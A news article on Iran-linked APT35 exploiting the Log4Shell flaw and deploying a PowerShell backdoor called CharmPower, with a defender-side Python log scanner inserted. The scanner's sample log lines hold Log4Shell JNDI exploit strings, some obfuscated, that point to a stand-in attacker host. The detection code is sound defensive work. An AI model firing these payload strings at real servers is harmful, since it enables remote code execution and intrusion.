An Iranian state-sponsored threat actor has been observed scanning for and attempting to exploit the Log4Shell flaw, then deploying a modular PowerShell backdoor dubbed “CharmPower” for post-exploitation operations.
The recently disclosed Log4Shell vulnerability, tracked as CVE-2021-44228, in the widely used Log4j logging library allows remote execution of arbitrary code on vulnerable systems.
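As an added defender-side example (not code from the article or from the researchers it cites), the Python below scans constructed web-access log lines for the Log4j `${jndi:` lookup that Log4Shell exploitation attempts carry, normalising URL-encoded and nested-lookup variants before matching; the IP addresses, timestamps and the `attacker.example` host are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample web-access log lines (not taken from the article).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:15:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:15:01:09 +0000] "GET /login HTTP/1.1" 200 77 "-" "${jndi:ldap://attacker.example/a}"
203.0.113.9 - - [10/Dec/2021:15:02:41 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fx%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"
203.0.113.11 - - [10/Dec/2021:15:03:00 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://attacker.example/z}"
198.51.100.2 - - [10/Dec/2021:15:04:15 +0000] "GET /docs HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Innermost Log4j lookups commonly used to split up the literal "jndi":
# ${lower:x} / ${upper:x} case lookups and the ${:-x} / ${::-x} default-value form.
_OBFUSCATION = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}|\$\{:*-([^${}]*)\}", re.IGNORECASE
)
# Log4j resolves lookup prefixes case-insensitively, so match on a lowercased line.
_JNDI = re.compile(r"\$\{\s*jndi\s*:")


def normalize(line: str, max_rounds: int = 10) -> str:
    """URL-decode (twice, for double encoding) and collapse nested lookups until stable."""
    s = unquote(unquote(line))
    for _ in range(max_rounds):
        new = _OBFUSCATION.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), s
        )
        if new == s:
            break
        s = new
    return s.lower()


def find_jndi_attempts(log_text: str) -> list[tuple[int, str]]:
    """Return (line number, client IP) for every log line carrying a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if _JNDI.search(normalize(line)):
            hits.append((lineno, line.split()[0]))
    return hits


if __name__ == "__main__":
    for lineno, ip in find_jndi_attempts(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup attempt from {ip}")
```

Matching on the normalised form catches the encoded and nested variants that a plain search for the literal string would miss; a hit marks a probe or exploitation attempt, not a confirmed compromise.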
Suspected Iranian-backed actor APT35, also known as Charming Kitten, Phosphorus and TA453, has reportedly found a way to conduct Log4Shell attacks to deploy CharmPower, a new PowerShell backdoor.
CharmPower has four main initial modules: one validates network connectivity, one gathers basic system information, one decodes the command-and-control domain retrieved from a hardcoded URL stored in an Amazon Web Services Inc. S3 bucket, and one receives, decrypts and executes follow-up modules.
APT35 reportedly used servers hosted by OVH SAS and Hetzner Online GmbH, providers it has also used in the past.
“Judging by their ability to take advantage of the Log4j vulnerability and by the code pieces of the CharmPower backdoor, the actors are able to change gears rapidly and actively develop different implementations for each stage of their attacks,” said Check Point Research.
© Fourth Estate® — All Rights Reserved.